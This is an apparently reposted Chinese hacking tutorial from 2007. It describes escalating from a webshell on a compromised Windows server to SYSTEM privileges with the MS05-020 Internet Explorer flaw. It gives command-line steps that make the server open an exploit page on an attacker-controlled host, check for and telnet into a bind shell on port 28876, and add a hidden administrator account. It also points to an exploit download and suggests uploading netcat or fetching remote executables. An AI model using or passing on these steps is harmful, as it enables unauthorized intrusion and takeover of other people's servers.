webshell,主动利用MS05020漏洞提升权限(WEBSHELL)

主动利用MS05020漏洞提升权限(WEBSHELL) - 网络安全 - 电脑教程网

主动利用MS05020漏洞提升权限(WEBSHELL)

日期:2007-06-15   荐:
screen.width-300)this.width=screen.width-300' border='0' alt='Click to Open in New Window'>

screen.width-300)this.width=screen.width-300' border='0' alt='Click to Open in New Window'>

screen.width-300)this.width=screen.width-300' border='0' alt='Click to Open in New Window'>

PS:好久都没有写文章了,今天闲着没事(其实不是没有事,是我比较郁闷,快考CET4了,但是心里都没有底),随便丢一个垃圾文章出来,希望能对大家有所帮助。
今天我要带给大家的是,当我们得到WEBSHELL后如何得到SYSTEM权限的新方法, 提升权限这个已经是老生常谈了,网络上已经有很多种提升权限的方法了,在这里我就不在提了,今天我给大家介绍的是就是主动利用MS05020漏洞来达到我们提升权限的目的。
MS05020是一个IE漏洞,2005.4份的时候微软就发步了这个公告:
安全漏洞CN-VA05-025
发布日期:2005-04-13
漏洞类型:远程执行代码
漏洞评估:高危
受影响版本:
Microsoft windows 2000 Service Pack 3 和 Microsoft Windows 2000 Service Pack 4
Microsoft Windows XP Service Pack 1 和 Microsoft Windows XP Service Pack 2
Microsoft Windows XP 64-Bit Edition Service Pack 1 (Itanium)
Microsoft Windows XP 64-Bit Edition Version 2003 (Itanium)
Microsoft Windows Server 2003
Microsoft Windows Server 2003(用于基于 Itanium 的系统)Microsoft Windows 98、Microsoft Windows 98 Second Edition (SE) 和 Microsoft Windows Millennium Edition (ME) 测试过的 Microsoft Windows 组件:
漏洞描述:
Internet Explorer 由于其处理某些 DHtml 对象的方式而存在一个远程执行代码漏洞。攻击者可以通过构建恶意的网页来利用该漏洞。 如果某个用户访问了恶意网站,此恶意网页就可能允许远程执行代码。成功利用此漏洞的攻击者可以完全控制受影响的系统。Internet Explorer 由于其处理某些 URL 的方式而存在一个远程执行代码漏洞。攻击者可以通过构建恶意的网页来利用该漏洞。 如果某个用户访问了恶意网站,此恶意网页就可能允许远程执行代码。成功利用此漏洞的攻击者可以完全控制受影响的系统。Internet Explorer 由于其处理分级审查文件的方法而存在一个远程执行代码漏洞。攻击者可以通过构造特制的分级审查文件来利用此漏洞。如果用户访问了恶意网站或查看了恶意的电子邮件,并接受安装此恶意分级审查文件,则该文件可能允许远程执行代码。成功利用此漏洞的攻击者可以完全控制受影响的系统。 不过,要利用此漏洞,需要进行大量用户交互。
大家看到上面的漏洞描述了吗?当被人浏览的时候才会受到攻击,平时我们利用IE漏洞都是先把有攻击性的页面放到网上,然后等待别人去浏览,这样浏览者就会中招了。

[1] [2]  

今天我们要提升权限,那自然是让我们要提升权限的主机去浏览存在漏洞的页面了,那当我们得到WEBSHELL后怎么才能让主机去浏览这个页面呢?
Ms05020的EXP网页代码已经出来了,大家可以到:
http://www.eviloctal.com/forum/read.php?tid=10127
去下载,假如我们已经把这个EXP放到http://www.xxxx.com/ms05020.html的地方,
下面我们开始利用这个EXP,进入到我们的ASP木马,打开CMDSHELL,如果用不了的,大家自己想办法解决(可以自己上传一个CMD.EXE上去)。
在命令行里输入:start http://www.xxxx.com/ms05020.html 然后点执行。
screen.width-300)this.width=screen.width-300' border='0' alt='Click to Open in New Window'>

这个时候主机的IE就会去访问我们的这个MS05020.HTML,那么如果主机没有打扑钉的话,就会绑定一个28876的断口在主机上。
接着我们输入:netstat -an find "28876" 看看是否成功绑定,第一次的话,会慢一些,大家要等待一下,我这里很快就成功了。然后我们telnet上去马上就成功了
screen.width-300)this.width=screen.width-300' border='0' alt='Click to Open in New Window'>

大家看到了:(我添加了一个temp的管理员)
screen.width-300)this.width=screen.width-300' border='0' alt='Click to Open in New Window'>

现在我们已经拿到SYSTEM权限了 ,大家还想干什么不可以?
后记:其实大家还可以先上传NC,然后连接到本地后,再输入:
start http://www.xxx.com/ms05020.html也是可以的。
还有就是如果可以的话还可以这样输入:
start “C:\Program Files\Internet Explorer\icxplore.exe” http://www.xxx.com/ms05020.htm
这个要看你的情况了,一般虚拟主机如果允许访问的话,那还是用第一个命令好了!
我测试过在2K pro、 2K server(2000 Enterprise Terminal Server) 、2003都成功过!不过也有不成功的时候,而且不成功的概率很大,特别是到虚拟机的时候,有一次我没有成功,然后我开了3389进入,发现IE没有弹出来,而是出来了一个IE设置向导,也就是说这个服务器没有对IE进行网络设置IE是无法访问网络的,艾,其实我现在也没有搞清楚是怎么会事有点能成功有点不行,想也想不通,因为start ist:http://www.xxx.com/xxx.exe总是能成功!把XXX。EXE下载到它的电脑上面!我最后认为估计这个还是和 MS05020.HTM这个文件有关。艾,看来这个方法的利用价值也很小了,本来不想发出来了的,既然写出来了,还是发表出来一下吧!刚刚和无敌讨论了一下,他也是说不成功的原因估计也是这个,还有就是系统打了IE补丁。

(出处:http://www.sheup.com)


 [1] [2] 

(出处:http://www.sheup.com)


 [1] [2] [3] 

标签: